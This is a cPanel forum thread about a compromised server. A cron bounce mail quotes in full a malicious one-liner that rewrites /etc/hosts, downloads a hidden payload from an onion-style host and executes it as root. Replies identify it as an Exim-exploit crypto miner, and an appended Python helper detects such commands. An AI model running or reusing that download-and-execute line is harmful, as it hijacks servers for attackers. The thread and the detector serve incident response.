Mail delivery failed: returning message to sender


May 8, 2013
cPanel Access Level
Root Administrator
Hi.

I upgraded my cPanel after the Exim exploit, and ever since then I have been getting emails in the queue that contain the following.

Content-type: text/plain; charset=us-ascii

This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

[email protected]
root cannot accept local mail deliveries

Content-type: message/delivery-status

Reporting-MTA: dns;

Action: failed
Final-Recipient: rfc822;[email protected]
Status: 5.0.0

Content-type: text/rfc822-headers

Return-path: <[email protected]>
Received: from root by with local (Exim 4.92)
(envelope-from <[email protected]>)
id 1hepQP-00074l-Uw
for [email protected]; Sat, 22 Jun 2019 23:28:02 +0000
From: [email protected] (Cron Daemon)
To: [email protected]
Subject: Cron <[email protected]> tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <[email protected]>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i "onion.\|\|tor2web"|wc -l) -ne 0 ]; then echo " localhost" > /etc/hosts >/dev/null 2>&1; fi; (${curl} -fsSLk --connect-timeout 26 --max-time 75 -o /root/.cache/.ntp||${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.example.tld/src/ldm -o /root/.cache/.ntp||${curl} -fsSLk --connect-timeout 26 --max-time 75 -o /root/.cache/.ntp||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 -O /root/.cache/.ntp||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.example.tld/src/ldm -O /root/.cache/.ntp||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 -O /root/.cache/.ntp) && chmod +x /root/.cache/.ntp && /bin/sh /root/.cache/.ntp
Content-Type: text/plain; charset=ANSI_X3.4-1968
Auto-Submitted: auto-generated
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
X-Cron-Env: <USER=root>
Message-Id: <[email protected]>
Date: Sat, 22 Jun 2019 23:28:01 +0000
X-Exim-DSN-Information: Due to administrative limits only headers are returned

How can I fix this? I am getting mails every 2 minutes.




Get Proactive!
Apr 8, 2003
Chesapeake, VA
cPanel Access Level
DataCenter Provider
It looks to me like your hostname is not an FQDN. Go to WHM and reset your hostname. This is a common problem with OpenVZ VMs, which I'd bet is what you have.

Only your host can fix the issue with the changing hostname every time you boot.


Well-Known Member
May 20, 2003
cPanel Access Level
Root Administrator
Checking Google for just a snip of your post:
/root/.cache/.ntp) && chmod +x /root/.cache/.ntp && /bin/sh /root/.cache/
...and I found this link. Worth looking at this closer I think.
What does this entry in my server's crontab do?
In short, your server has been hacked and hackers are running a crypto miner on it. This is bad.
I've edited your post above to remove the URLs in it. They were very similar to the URLs mentioned at that link.

If you're unsure what to do here, you might want to look into hiring someone that can help you with this:
System Administration Services | cPanel Forums


Product Owner
Staff member
Nov 14, 2017
1. The error here:

[email protected]
root cannot accept local mail deliveries

Indicates that you've not set the address for root's mail to be forwarded to in WHM>>Server Contacts>>Edit System Mail Preferences.

2. And by far the most important:

That cron output is associated with the Exim compromise. If you'd like for us to investigate to identify if your server is root compromised, we would be happy to. I also want to point out that there is no safe way to clean a root-level compromise; if it is found that you have been affected (which I am almost certain you have), you will need to migrate. We also offer migrations for this.

If you'd like cPanel's support to assist, you can open a ticket using the link in my signature. Once open, please reply with the Ticket ID here so that we can update this thread with the resolution once the ticket is resolved.
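
Added example, not part of the thread and not cPanel's code: a triage helper that pulls the job command out of a cron mail's `Subject:` header, as in the bounce quoted in the first post, and reports which traits of that command it shows. The indicator names, the sample headers and the placeholder host are constructed for illustration.

```python
import email
import re
from typing import List, Optional

# Traits visible in the cron command quoted in the bounce above (names are ours).
INDICATORS = {
    # Download written to a dot-file, e.g. "-o /root/.cache/.ntp".
    "hidden_output_path": re.compile(r"(?<!\S)-[oO]\s+\S*/\.[\w.-]+"),
    # curl -k or wget --no-check-certificate: TLS verification switched off.
    "tls_verification_disabled": re.compile(
        r"--no-check-certificate|--insecure|curl\S*\s+-[A-Za-z]*k"),
    # The same path is made executable and then handed to a shell.
    "download_then_execute": re.compile(
        r"chmod\s+\+x\s+(\S+).*?\b(?:ba)?sh\s+\1(?!\S)", re.DOTALL),
    # The job redirects output into /etc/hosts.
    "hosts_file_write": re.compile(r">\s*/etc/hosts\b"),
}


def command_from_cron_mail(headers: str) -> Optional[str]:
    """Return the job command from a cron mail's Subject header, else None."""
    subject = email.message_from_string(headers)["Subject"] or ""
    m = re.match(r"Cron <[^>]*>\s+(.*)", subject, re.DOTALL)
    return m.group(1).strip() if m else None


def triage(command: str) -> List[str]:
    """Names of the indicators that match the command, in table order."""
    return [name for name, rx in INDICATORS.items() if rx.search(command)]


# Constructed sample headers (placeholder host, not taken from the thread).
SUSPECT = (
    "From: root (Cron Daemon)\n"
    "Subject: Cron <root@host.invalid> curl -fsSLk https://placeholder.invalid/x"
    " -o /root/.cache/.ntp && chmod +x /root/.cache/.ntp"
    " && /bin/sh /root/.cache/.ntp\n"
    "X-Cron-Env: <SHELL=/bin/sh>\n"
)
BENIGN = ("Subject: Cron <root@host.invalid> "
          "/usr/bin/find /tmp -type f -mtime +7 -delete\n")

if __name__ == "__main__":
    for hdrs in (SUSPECT, BENIGN):
        cmd = command_from_cron_mail(hdrs)
        print(triage(cmd) or "no indicators", "<-", cmd)
```

The patterns are heuristics keyed to this one command shape, so an empty result says nothing about whether a server is clean.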